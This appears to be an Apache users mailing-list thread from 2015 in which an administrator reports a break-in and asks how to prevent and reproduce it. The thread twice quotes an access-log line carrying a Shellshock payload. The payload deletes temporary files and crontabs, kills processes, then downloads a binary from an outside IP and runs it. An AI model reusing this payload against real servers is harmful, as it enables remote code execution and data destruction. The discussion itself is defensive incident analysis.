Re: Security question

[Victor Sterpu <victor@xxxxxxxx>]

"sc.gif" was executed.

On 03.07.2015 09:05, Bremser, Kurt (AMOS Austria GmbH) wrote:

I guess that the 200 comes from the fact that apache simply delivered the /index.html page.

Or did you find that "sc.gif" was transferred and executed?

 

Kurt Bremser

AMOS Austria

 

Newton was wrong. There is no gravity. The Earth sucks.

---

Von: Victor Sterpu [victor@xxxxxxxx]
Gesendet: Donnerstag, 2. Juli 2015 14:29
An: users@xxxxxxxxxxxxxxxx
Betreff: **SPAM?** Re: Security question [wd-vc]

In the end the attack was succesfull. Log show the last command:
62.1.212.154 - - [01/Jul/2015:17:01:55 +0300] "GET / HTTP/1.1" 200 885 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

But I don't know how he launched this script.
How can I prevent this?
I was hoping the server would execute only local scripts, is there something I can do to allow only local scripts to be executed?

On 02.07.2015 15:13, Yehuda Katz wrote:

It is an attempt to exploit a specific configuration. By the fact that apache returned a 404 (the log line says so), you can see that attempt was not successful.

- Y

Sent from a gizmo with a very small keyboard and hyperactive autocorrect.

On Jul 2, 2015 8:00 AM, "Victor Sterpu" <victor@xxxxxxxx> wrote:

Hello

A hacker attacked a apache2 web server by HTTP injection.
The log show what he has done:
62.1.212.154 - - [01/Jul/2015:17:02:06 +0300] "GET /phppath/cgi_wrapper HTTP/1.1" 404 280 "-" "() { :;};/usr/bin/perl -e 'print \"Content-Type: text/plain\\r\\n\\r\\nXSUCCESS!\";system(\"cd /var/tmp/ ;cd /tmp/ ; rm -rf /tmp/* ; rm -rf /var/tmp/* ; rm -rf /tmp/.* ; rm -rf /var/tmp/.* ; crontab -r ; killall -9 wget fetch curl lwp-download b f r xx y i.gif print start pscan pnscan ps ; wget http://80.68.94.216/sc.gif ; curl -O http://80.68.94.216/sc.gif ; chmod +x sc.gif ; nohup ./sc.gif & \");'"

How can I prevent this in the future and how can I reproduce?
I tried to reproduce but is not clear how he launched this command and I want to know so I can test my vulnerabilities in the future.
The path "/phppath/cgi_wrapper" doesn't exist at all.

Thank you

---------------------------------------------------------------------
To unsubscribe, e-mail: users-unsubscribe@xxxxxxxxxxxxxxxx
For additional commands, e-mail: users-help@xxxxxxxxxxxxxxxx

AMOS Austria GmbH
1130 Wien, Hietzinger Kai 101-105
FN 365014k, Handelsgericht Wien
UID: ATU 66614737

http://www.allianz.at

********************************************************
Dieses E-Mail und allfaellig daran angeschlossene Anhaenge
enthalten Informationen, die vertraulich und
ausschliesslich fuer den (die) bezeichneten Adressaten
bestimmt sind.
Wenn Sie nicht der genannte Adressat sind, darf dieses
E-Mail samt allfaelliger Anhaenge von Ihnen weder anderen
Personen zugaenglich gemacht noch in anderer Weise
verwertet werden.
Wenn Sie nicht der beabsichtigte Empfaenger sind, bitten
wir Sie, dieses E-Mail und saemtliche angeschlossene
Anhaenge zu loeschen.

Please note: This email and any files transmitted with it is
intended only for the named recipients and may contain
confidential and/or privileged information. If you are not the
intended recipient, please do not read, copy, use or disclose
the contents of this communication to others and notify the
sender immediately. Then please delete the email and any
copies of it. Thank you.
********************************************************